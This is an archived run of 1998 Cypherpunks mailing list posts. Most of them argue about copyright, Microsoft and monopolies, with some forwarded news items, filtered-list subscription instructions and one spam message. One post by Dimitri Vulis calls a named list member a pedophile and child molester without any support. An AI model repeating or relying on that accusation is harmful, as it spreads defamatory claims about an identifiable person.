of the EFF is mounting a campaign against fingerprinting on
driver's
licenses.

Can't remember the URL for it though...

jim burnes





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Fri, 6 Feb 1998 00:41:09 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: the best justice money can buy --Lessig (fwd)
Message-ID: <199802051634.KAA02262@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Thu, 5 Feb 1998 08:23:58 -0800 (PST)
> From: mark@unicorn.com
> Subject: Re: the best justice money can buy --Lessig

> Of course there's a free-market remedy for Microsoft; eliminate copyright. If
> anyone can copy Microsoft software for free, it would be forced to compete
> on real benefits rather than installed base.

If there were no copyright nobody would have any reason to market software
or much else for that matter. I would predict that much of the technology
and infrastructure we have now wouldn't exist. It would also stiffle
creativity and new methodologies because there would be no profit in it to
recoup development costs. Those who would survive in such a market would be
the 800-lb gorillas because only they would have the resources to squash the
smaller companies.

Free markets monopolize.


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Fri, 6 Feb 1998 14:12:25 +0800
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: the best justice money can buy --Lessig (fwd)
In-Reply-To: <aR7Fke1w165w@bwalk.dm.com>
Message-ID: <Pine.BSF.3.91.980205101505.1342A-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain





On Thu, 5 Feb 1998, Dr.Dimitri Vulis KOTM wrote:

> Jim Choate <ravage@ssz.com> writes:
> 
> > 
> > Forwarded message:
> > 
> > > Date: Thu, 5 Feb 1998 08:23:58 -0800 (PST)
> > > From: mark@unicorn.com
> > > Subject: Re: the best justice money can buy --Lessig
> > 
> > > Of course there's a free-market remedy for Microsoft; eliminate copyright. 
> > > anyone can copy Microsoft software for free, it would be forced to compete
> > > on real benefits rather than installed base.
> > 
> > If there were no copyright nobody would have any reason to market software
> > or much else for that matter. I would predict that much of the technology

[SNIP]

> 
> Software development seems to be thriving in countries that aren't very keen
> on enforcing copyright laws - do you care to explain why?

Would you care to explain where? 

There's a big difference between a "flourishing" market for custom,
in-house-only software (especially in a language that is not high on the
list for US developers), and a commercial software market consisting of
widely distributed applications. The in-house stuff doesn't need copyright
protection; it's never allowed out, and even if it were, what are the odds
it could be used by others without access to source code?  Custom software
is more a matter of selling a service than a "product", and it's a lot
harder to "bootleg" services. 

What software products can you come up with that have the same level of 
market penetration as those engineered in the US or Canada? How many of 
those are from nations that do not honor copyright?


> > 
> > Free markets monopolize.
> Hmm... There's no copyright on perfumes.  There are market leaders in perfumes,
> but no monopoly; hardly even an olygopoly.
> 

That's because the primary product is the image built by advertising, not 
the scent which is often fairly accurately duplicated (not that I'd know 
- my favorite scent is hallertau).

One of my professors defined advertising as "creating demand for that 
which is inherently worthless."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Thu, 5 Feb 1998 21:21:15 +0800
To: guy@panix.com
Subject: Re: Changing to Moderated Cypherpunks -- How?
In-Reply-To: <199802050505.AAA01452@panix2.panix.com>
Message-ID: <199802051047.KAA01376@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




Information Security <guy@panix.com>
> I'd be glad to handle it.
> 
> The only criteria is to delete Dr. Dim and his nyms.

How are you going to recognize Dimitri's nyms if he has any.

Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sunder <sunder@brainlink.com>
Date: Fri, 6 Feb 1998 00:53:33 +0800
To: "James F. Marshall" <marshall@ibm.net>
Subject: Re: Changing to Moderated Cypherpunks -- How?
In-Reply-To: <199802050343.DAA46984@out5.ibm.net>
Message-ID: <34D9E920.7BF3739B@brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain



James F. Marshall wrote:
> Too much noise in the unedited list.
> How does one change to the moderated list?

Hi there, as requested, here's some info about the filtered cypherpunks
list which I run (by hand with the help of a couple of mailbots)

This list is NOW running from: sunder@sundernet.com
GZIPped versions of the digests are available from:

        http://www.sundernet.com/fdigest.html

Basically, I use the 'bots to keep the list of recipients, then forward
any message to this list of usernames which I find interesting, and
usually noise-free... 

Since, I do this by hand, AND since there is no majordomo mailing list
software, and since I get a lot of mail, it's a good idea to make sure the
subject of any messages you send to me stand out.  i.e. make the subject
line: 
 
    "***000 Personal junk mail for the human, not the bots ***"

(The 0's are there to make sure that when Pine sorts the messages on this 
side, they come up on top, making sure I'll see them immediatly.)

There is no automated filtering of any sort...   Whatever message I find 
to be interesting, news-worthy, or technical (theoretical crypto, actual 
code, etc) gets handed over to the bots, which send it to this list.

If you use some sort of filtering program to move messages to a folder, 
look for the string "FCPUNX:" (without quotes) in the subject field.
 
There will usually be a propagation delay of one day to a week days -
sometimes as long as two weeks between the messages on the actual
cypherpunks list, and this filtered one.  This is because I may not always
get the chance to log in every day, and also because I may have to wade
through tons of noise/spam/flames from the real list. :-)

Occasionally, if I see something interesting from another list (such as
Cyber Rights, coderpunks, etc) I will forward it here if I feel that it
pertains to Cypherpunk interests, or that you'd like to see it. 

You should unsubscribe yourself from the real list by sending an
"unsubscribe cypherpunks" message to majordomo@toad.com - that is send a
message with no subject and just that single line - no signature either,
so as to unsubscribe.  - Unless you wish to continue to receive messages
from the real list as well as copies of those messages from here. :-)

All filtering is again according to my whims so if you dislike what I 
send you, sorry.  I might eventually work something out where this list 
will be broken up into many tiny lists so you'd subscribe to whatever 
subjects you're interested in.

This is a free service, no strings attached, just tons o'mail, but less 
mail than the unfiltered list...

Also note that the bots I run may sometimes be slightly buggy and may do 
unexpected weird things.  Appologies in advance if this happens.  But 
please by all means do report any such runaway bot occurances.

If you wish to unsubscribe yourself from this list, just send a message 
with the subject "unsubscribe fcpunx" (no quotes) and the next time I log 
in, one of the bots will handle the ubsubscribe.

You can re-subscribe yourself as many times as you like, you'll only get
one copy of each message, but as many copies of the request response as
you've sent.The 'bots hone in on your address and send mail only there, so
subscribe yourself from whatever account you want to receive mail. 

If by accident you subscribe from two different machines, the bots won't 
know the difference and you'll get two copies of each filtered message, 
so be careful.

This also means that you can only unsubscribe yourself from the same
address you subscribed from.

To get help, send a message with the subject "help fcpunx."

To subscribe yourself (if you see this, you are subscribed) send a 
message with the *SUBJECT* "subscribe fcpunx"

NOTE: THE BOTS ONLY RESPOND TO THE SUBJECT LINE, NOT TO TEXT IN THE BODY 
OF YOUR MESSAGE!

The bots only look at your message's subject and your mailing address so 
it doesn't matter what you put in the body.

Whenever the 'bots honor a request from you, you'll see a response mailed 
from them (under my name.)

Since the bots are only active when I log in and run them by hand, the 
message acknowledging your request may take several days to get to you.

*ALL COMMANDS MUST BE SENT IN THE SUBJECT OF THE MESSAGE!  The body 
(text) of the message are ignored.

Commands available:

 subscribe fcpunx           - subscribes you to the list and you are 
                              visible to fcpunx who requests
 subscribe invisible fcpunx - subscribe but don't let others know

 digest fcpunx              - receive the digest version (visibly)
 digest invisible fcpunx    - receive the digest invisibly

 unsubscribe fcpunx         - unsubscribe from the list or digest
 undigest fcpunx

 who fcpunx                 - receive a list of (visible) subscribed users
                                * THIS IS DISABLED CURRENTLY FOR PRIVACY
                                  PROTECTIONS OF THE SUBSCRIBERS ON THIS LIST *

 help fcpunx                - sends a help file (you're looking at it)

If you're already subscribed to the list and want to switch to the digest 
version, you can do this by sending a digest fcpunx message; the reverse 
is also true.  Notice that you cannot subscribe to both the digest and 
the list.  Sorry.  If you'd like that feature either use two different 
accounts to receive them, or complain to me and I'll add it in.

The unsubscribe and undigest commands do the same thing, they take you 
off the list no matter which version you're subscribed to.

Note:

        I do not claim any responsability for the content, fitness to a purpose
        or usefulness of any of the messages forwarded to, archived to, or
stored
        on this web site.  The responsability of these messages lies solely on
        the shoulders of their respective authors.

        No attempt is made at censoring this information for or from a legal
        standpoint.  This information is relayed to you as an expression of
        the First Amendment of the Constitution of the United States of
America.
        Certain restrictions may apply depending on your locale, the political
        nature of your respective governments, etc.  Any copyrighted
information
        forwarded by this filtering service is the property of its owners
and/or
        creators.  The original senders of these messages are responsible for
        their content, etc.  This filtering services disclaims all such
        responsability.

        Should you take offense to any of the messages forwarded by this
service,
        take it up with the original posters of the messages.  You may also
        unsubscribe from this service.  Subscription to this filtering services
        means acceptance to these terms and disclaimers.

        
=============================================================================
 + ^ + |  Ray Arachelian    |FL|       KAOS KERAUNOS KYBERNETOS      |==/|\==
  \|/  |sunder@brainlink.com|UL|__Nothing_is_true,_all_is_permitted!_|=/\|/\=
<--+-->| ------------------ |CG|What part of 'Congress shall make no |=\/|\/=
  /|\  | Just Say "No" to   |KA|law abridging the freedom of speech' |==\|/==
 + v + | Janet Reno & GAK   |AK|        do you not understand?       |=======
===================http://www.brainlink.org/~sunder/=========================
           ActiveX! ActiveX! Format Hard drive? Just say yes!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Burnes <jim.burnes@ssds.com>
Date: Fri, 6 Feb 1998 05:49:32 +0800
To: Jim Choate <ravage@ssz.com>
Subject: Re: the best justice/kinds of monopolies
In-Reply-To: <199802051634.KAA02262@einstein.ssz.com>
Message-ID: <34DA3157.1FF4FA7A@ssds.com>
MIME-Version: 1.0
Content-Type: text/plain



Jim Choate wrote:
> 
> Forwarded message:
> 
> > Date: Thu, 5 Feb 1998 08:23:58 -0800 (PST)
> > From: mark@unicorn.com
> > Subject: Re: the best justice money can buy --Lessig
> 
> > Of course there's a free-market remedy for Microsoft; eliminate copyright. If
> > anyone can copy Microsoft software for free, it would be forced to compete
> > on real benefits rather than installed base.
> 
> If there were no copyright nobody would have any reason to market software
> or much else for that matter. I would predict that much of the technology
> and infrastructure we have now wouldn't exist.

Thats pretty obvious.  I'm usually the last person to defend
Microsoft, but
cancelling copyright is throwing the baby out with the
proverbial bathwater.

There are a couple of obvious free market solutions.  The first
that comes
to mind is to stop buying Microsoft product.  This needs to be
restated because
even though obvious, it has a number of important follow-on
conclusions.

(1) There are other usable operating systems. (linux, mac-os,
os/2)
(2) There are other usable applications. (applix, macwrite?,
whatever)

Why won't people stop buying microsoft product?

(1) FUD helped along by a microsoft reality-altering marketing
budget
(2) The *applications* they write are sometimes quite usable.
(3) Their applications only work on *their* OS (mostly)?  Why is
that?
(4) Their OS, even considering its questionable quality has,
until this
    point, hornswaggled a bunch of developers because its the
*defacto*
    desktop applications API.  Why that is the case is probably
a topic
    for endless speculation -- though it probably comes down to
some
    version of the "stack 'em deep and sell 'em cheap"
philosophy -- 
    something that Apple still hasn't learned.

(5) ...and most importantly of all...it hasn't become painfull
enough
    yet to stop purchasing Microsoft software.

> 
> Free markets monopolize.
> 

Hmmm.  Thats a rather sweeping generalization.  Perhaps it would
be more
enlightening to discuss the nature of monopolies.  It is rarely
possible
to enforce a monopoly that isn't a natural monopoly.  A company
will tend
to keep a lion's share of the market as long as continued
investment
in more efficient production gives them greater market share --
bringing
you cheaper goods and larger quantities of them.  At that point
nobody cares
because quality goods are being sold as low prices.  When that
breaks down
all natural monopolies start to crumble or revert to their
previous market
share.

Having said that, let me follow it with a big "all other things
being equal".

One of the reasons NT became popular is because they priced
their NT
server not "by the client" as Novell used to, but at a
flat-price (if
memory serves -- which it is doing more infrequently these days
;-)

In doing so Novell's market share took a serious hit.  To some
extent
I say good riddance.  Novell server's IMOHO suck as a server
architecture
(not to mention truly horrible and snotty tech support).

Novell didn't react quickly enough and lost tremendous market
share.  Are
we suggesting that Novell be protected by the US Justice
Department?
I certainly hope not.  You are welcome to go back to those days.

The only other kinds of monopolies are cartels, and government
enforced
monopolies of both the public and private kind (the latter being
the most
heinous).

Cartels always collapse because one of the partners will
eventually see
the increasing profits to be made by breaking the cartel.  When
this happens
the company that breaks the cartel is the winner and the last
one to leave
the cartel may well collapse financially.  If members of a
Cartel get
together and use guns to prevent the breakup of the cartel then
that
is a lot more like a government enforced private monopoly -- bad
news.

Government-enforced public monopolies like the US Post office
and public
education are wasteful, out of touch with their markets (because
of
the lack of competitive price feedback) and thus inefficient. 
They
have no valid function in a free society and are a waste of
taxpayer
dollars.  The USPS will tell you that everything is hunky-dory
because
they don't use taxpayer dollars.  What they don't tell you is
that the
difference between the price you pay for their stamps and what
you would
in a free market is your tax.  (this and the strange tendency of
workers
to "go postal" -- you rarely hear about FedEX employees going on
an
AK47 rampage, must be the water ;-)

Goverment-enforced private monopolies teeter dangerously close
to the
pure definition of fascism.  Fascism, from the latin "fascia"
means
"to bind together" (perhaps you remember the "fascia" tissue
from
high-school biology class during dissection of frogs, cats and
other
unlucky animals).  In this case they bind a force monopoly with
a
yet-to-be-named monopoly.  Classic examples of
Fascism^h^h^h^h^h^h^h government
enforced-private-monopolies in the US are the Federal Reserve
System, the 
AMA, and the local Bar associations.  Why is this?  All these
monopolies
depend on FUD and govt to enforce their services.  "What would
happen if we didn't
regulate xyz is that all hell would break loose and many people
would
lead lives of horrible desperation.  'There oughta be a law!'
etc...blah blah..."
You know the drill.

Now that we have a perspective on monopolies, perhaps we can
take
a look a microsoft.  Microsoft is not a force monopoly
(usually), its not
run by the government (thank god), it doesn't appear to be a
cartel
(usually) so unless further information comes in it looks like a
natural monopoly.  What does it take to undo a natural monoply?

Build something cheaper, better and more reliable.

Its just possible (and this might be a stretch, but only by a
little)
that Linux, Free Netscape Sources, Java etc might acheive this.

Certainly Apache is more popular than any other webserver.

How you come up with a new product in this type of market
without
M$ "re-inventing it" and giving it away is anyone's guess.

(1) Hope that Linux/Scape/Java/KDE do something big
(2) Write a Win95/NT compatible operating system that is
    faster and cheaper.  If you can clone a Pentium, you
    can clone Windoze.  (visions of a QNX like OS with Win32
    API dance in my head).  A GPL'd VSTa-based Win32 OS
    would be pretty amazing.  This would be necessary because
    games are a big market and the Linux kernel just doesn't
    have what it takes to do realtime without a major hack.
    How about VSTa/a free DOS emulator/Wine.  If Sun would
    fund this effort it could take a lot of wind out of
    M$ sails.  Probably more than Java.  McNeally would have
    to hop down from his high-horse.

    When will this happen?  When the market gets tired of
    M$ practices and some lucky competitor comes to the
    fore.  Until then there is no devine right to a percentage
    of the operating system market share.

We can only code and hope.

(donning flame retardant vest)

jim burnes





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Fri, 6 Feb 1998 09:16:38 +0800
To: cypherpunks@toad.com
Subject: Re: the best justice money can buy --Lessig (fwd)
In-Reply-To: <199802051634.KAA02262@einstein.ssz.com>
Message-ID: <aR7Fke1w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain



Jim Choate <ravage@ssz.com> writes:

> 
> Forwarded message:
> 
> > Date: Thu, 5 Feb 1998 08:23:58 -0800 (PST)
> > From: mark@unicorn.com
> > Subject: Re: the best justice money can buy --Lessig
> 
> > Of course there's a free-market remedy for Microsoft; eliminate copyright. 
> > anyone can copy Microsoft software for free, it would be forced to compete
> > on real benefits rather than installed base.
> 
> If there were no copyright nobody would have any reason to market software
> or much else for that matter. I would predict that much of the technology
> and infrastructure we have now wouldn't exist. It would also stiffle
> creativity and new methodologies because there would be no profit in it to
> recoup development costs. Those who would survive in such a market would be
> the 800-lb gorillas because only they would have the resources to squash the
> smaller companies.

Software development seems to be thriving in countries that aren't very keen
on enforcing copyright laws - do you care to explain why?
> 
> Free markets monopolize.
Hmm... There's no copyright on perfumes.  There are market leaders in perfumes,
but no monopoly; hardly even an olygopoly.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Fri, 6 Feb 1998 08:20:43 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Feds warm spammers [CNN]
Message-ID: <199802060018.SAA03566@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

>                       FEDS WARN SUSPECTED E-MAIL SCAMMERS
>                                        
>      graphic February 5, 1998
>      Web posted at: 6:51 p.m. EST (2351 GMT)
>      
>      WASHINGTON (AP) -- The Federal Trade Commission and postal
>      inspectors have issued more than 1,000 warnings to businesses
>      suspected of sending illegal junk mail and operating shady
>      moneymaking schemes over the Internet.

[text deleted]


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Fri, 6 Feb 1998 09:17:46 +0800
To: cypherpunks@toad.com
Subject: Re: Changing to Moderated Cypherpunks -- How?
In-Reply-To: <199802051047.KAA01376@server.eternity.org>
Message-ID: <T2egke20w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain



Adam Back <aba@dcs.ex.ac.uk> writes:

>
> Information Security <guy@panix.com>
> > I'd be glad to handle it.
> >
> > The only criteria is to delete Dr. Dim and his nyms.
>
> How are you going to recognize Dimitri's nyms if he has any.

Guy Polis thinks that anyone smarter than him (and that's 99.99% of the
population) is my tentacle.  He thinks everything on this list except
him and Timmy May is my tentacle, including you too, Adam.

Guy Polis (guy@panix.com, eviljay@bway.net) is a pedophile child
molester who was fired from his consulting position at Salomon Brothers
after he was caught masturbating in his cubicle at the child pornography
JPEGs that he downloaded from the Internet.

In retaliation, Guy Polis spammed the firewalls mailing list with megabytes
of e-mail logs that he "intercepted" at Salomon Brothers, and accused
several of his former co-workers and supervisors of various crimes.

As far as I can determine, Guy Polis has been unemployed since the time
he was fired from Salomon.  If anyone knows otherwise, please let me know.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Fri, 6 Feb 1998 09:57:31 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: the best justice money can buy --Lessig (fwd)
Message-ID: <199802060155.TAA03984@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Subject: Re: the best justice money can buy --Lessig (fwd)
> From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
> Date: Thu, 05 Feb 98 16:26:45 EST

> > > Of course there's a free-market remedy for Microsoft; eliminate copyright. 
> > > anyone can copy Microsoft software for free, it would be forced to compete
> > > on real benefits rather than installed base.
> > 
> > If there were no copyright nobody would have any reason to market software
> > or much else for that matter. I would predict that much of the technology
> > and infrastructure we have now wouldn't exist. It would also stiffle
> > creativity and new methodologies because there would be no profit in it to
> > recoup development costs. Those who would survive in such a market would be
> > the 800-lb gorillas because only they would have the resources to squash the
> > smaller companies.
> 
> Software development seems to be thriving in countries that aren't very keen
> on enforcing copyright laws - do you care to explain why?

Oh yeah...

Software development is a long way from selling software, not the same
animal at all.

I mean when I go down to the dozen computer stores within a mile or so of my
house I am truly deluged by software from countries outside of the US and
Canada. I mean we have all heard of the Indian and Bulgarian software
billionares haven't we? And all those folks in Turkey just rolling in
cash...

Further, who do the majority of these folks who actualy make a reasonable
living work for either directly or under contract? Large US and Eurpean
countries thats who.

That's why those folks can make a living developing (not selling) software.

> > Free markets monopolize.

> Hmm... There's no copyright on perfumes.  There are market leaders in perfumes,
> but no monopoly; hardly even an olygopoly.

I can tell how often you buy perfume, the ones I buy for my girlfriend
certainly have a little 'c' on them... And as to the number of companies
that are actualy developing perfume versus reselling it under their own
house brands...there might be a couple dozen succesful (say stay in business
more than 5 years) in the whole world and I would go so far as to hypothesize
that if one were motivated to plot the number of companies per year over the
last say 50 years you would see the number go *down*.



    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Fri, 6 Feb 1998 12:12:57 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Free-market monopolization features...
Message-ID: <199802060335.VAA04271@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Hi,

This is the theory in its current working version:

An unregulated (free-market) economy will inherently monopolize when, but
not necessarily only if, the following are present:

 -  the market is saturated, in other words the number of consumers at
    any given time are equal to or less than the service providers ability
    to provide that service (or resource). This means the long-term survival
    of firms is a function of retained market share and raw resource share
    control/ownership.

 -  the technology and/or start-up costs are high in material and
    intellectual factors. This minimizes the potential for new providers
    to start up. Providers will also require non-disclosure and other
    mechanisms to reduce sharing of information and cross-communications
    except under controlled conditions. Expect an increase in certifications
    and implimentation standards required to do business with the more
    succesful of these providers.

 -  an individual or small group of service providers have a small but
    distinct efficiency advantage in technology, manufacturing, or
    marketing. Over a long-enough time this market advantage will grow
    and as a result widen the 'technology gap' between firms.

 -  expect the most efficient firms to share their profit with the
    critical intellectual contributors. This further reduces the
    problem of cross-communication and new provider start-up.

 -  expect to see the more successful providers to join in co-ops with
    the less succesful providers. This will be under the surreptitous
    goal of 'developing technology'. It's actual goal will be to cause
    these smaller firms to commit resources to such enterprises. As soon
    as it is strategicaly advantagous the primary providers will break-off
    the co-op. This has the effect of further reducing the ability of the
    smaller providers to react in a timely manner to market changes or
    develop new technology due to resource starvation.

 -  expect to see the less efficient providers to combine in an effort
    to reap the benefits of shared market share and resources. Unless
    this partnering provides a more efficient model and there is sufficient
    time for that efficiency to develop these new providers will eventualy
    fail or be joined with other providers.

 -  expect to see the primary provider buy those less efficient providers
    that don't fail completely. These purchases will be as a result of
    some new or unexpected technology that will significantly increase
    the market share of the primary provider -or- it will be with the
    goal of eliminating this secondary technology and forcing those
    market shares to do without or use the primary providers technology.



    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Fri, 6 Feb 1998 12:45:14 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: New Credit Rating System Coming [CNN]
Message-ID: <199802060405.WAA04465@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

>                       NEW CREDIT RATING SYSTEM ON HORIZON
>                                        
>      graphic February 5, 1998
>      Web posted at: 2:38 p.m. EST (1938 GMT)
>      
>      NEW YORK (AP) -- Within months, retailers will be able to use a new
>      computerized credit-rating system to decide not only whether they'll
>      take your check or debit card, but how big a check you can write.
>      
>      Banks will be able to use the system to determine whether they will
>      let you open a checking account, and what kind of fees you will pay.
>      
>      Deluxe Corp., the nation's biggest check printer, has joined Fair,
>      Isaac & Co., a credit scoring company, and Acxiom Corp., a data
>      warehouse, to create the system for rating a merchant's risk of
>      accepting checks and debit cards.


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Fri, 6 Feb 1998 12:36:48 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Free-market monopolization features... (fwd)
Message-ID: <199802060436.WAA04618@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Hi,

I left one out...

Forwarded message:

> From: Jim Choate <ravage@ssz.com>
> Subject: Free-market monopolization features...
> Date: Thu, 5 Feb 1998 21:35:16 -0600 (CST)

> An unregulated (free-market) economy will inherently monopolize when, but
> not necessarily only if, the following are present:

 -  initialy prices for services will be low to promote purchasing but
    as providers obtain larger market shares their prices will increase
    over time and out of step with inflation and other market forces in
    order to widen the profit gap. The strategy is one of 'use it or
    starve'.


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Frantz <frantz@netcom.com>
Date: Fri, 6 Feb 1998 16:05:19 +0800
To: Jim Burnes <ravage@ssz.com>
Subject: Re: the best justice/kinds of monopolies
In-Reply-To: <199802051634.KAA02262@einstein.ssz.com>
Message-ID: <v03110703b10070d62719@[207.94.250.77]>
MIME-Version: 1.0
Content-Type: text/plain



At 1:38 PM -0800 2/5/98, in a generally right on post, Jim Burnes wrote:
>(this and the strange tendency of
>workers
>to "go postal" -- you rarely hear about FedEX employees going on
>an
>AK47 rampage, must be the water ;-)

No, the problem is the US Postal Service's willingness to tolerate assholes
as managers.  There may be an argument for pinning that on the government
monopoly aspects of the USPS as well.


-------------------------------------------------------------------------
Bill Frantz       | Market research shows the  | Periwinkle -- Consulting
(408)356-8506     | average customer has one   | 16345 Englewood Ave.
frantz@netcom.com | teat and one testicle.     | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "WebWarrior3@InfoWar.Com" <WebWarrior3@InfoWar.Com>
Date: Fri, 6 Feb 1998 14:31:06 +0800
To: cypherpunks@cyberpass.net
Subject: RE Fingerprints and EF Georgia
Message-ID: <34DAABBC.3BCF1ED5@InfoWar.Com>
MIME-Version: 1.0
Content-Type: text/plain



Yup,
EF-Georgia
http://www.efga.org
has had an ongoing project dealing with fingerprinting for DL's

This is in reply to Jim Burns' post:
"If your interested in this problem, I believe that the Georgia
wing of the EFF is mounting a campaign against fingerprinting on
driver's licenses.

Can't remember the URL for it though..."

EF Georgia has consistantly had some mighty fine information on their
mail list, still on topic too for the most part.

Scott R. Brower
Electronic Frontiers Florida
http://www.efflorida.org
BTW...neither EFGA nor EFFlorida, or as far as I know, any other EF
group... is affiliated with EFF in any way but certain principals which
bind us together in a common cause.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mail <mail@reba.com>
Date: Fri, 6 Feb 1998 11:20:00 +0800
To: "Random Q. Hacker" <cypherpunks@Algebra.COM>
Subject: RebaNews
Message-ID: <199802060306.WAA00901@www.video-collage.com>
MIME-Version: 1.0
Content-Type: text/plain



Reba will join Rosie O'Donnell as her special co-host February 16, as The Rosie O'Donnell Show continues its broadcasts from Los Angeles.  In addition to pulling co-hosting duties, Reba will also perform "What If," her tribute song to the Salvation Army. 

Fresh off her wins at both the Peoples Choice Awards (which she hosted and won Favorite Female Musical Performer) and the American Music Awards (Favorite Female Country Artist), the February 16th appearance marks the second time Reba has appeared on The Rosie O'Donnell Show.

Later this month, Reba will begin work on the CBS-TV movie, "Forever and Always," tentatively scheduled to air in May.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mark@unicorn.com
Date: Fri, 6 Feb 1998 19:22:46 +0800
To: cypherpunks@cyberpass.net
Subject: Re: the best justice money can buy --Lessig (fwd)
Message-ID: <886763578.16480.193.133.230.33@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain



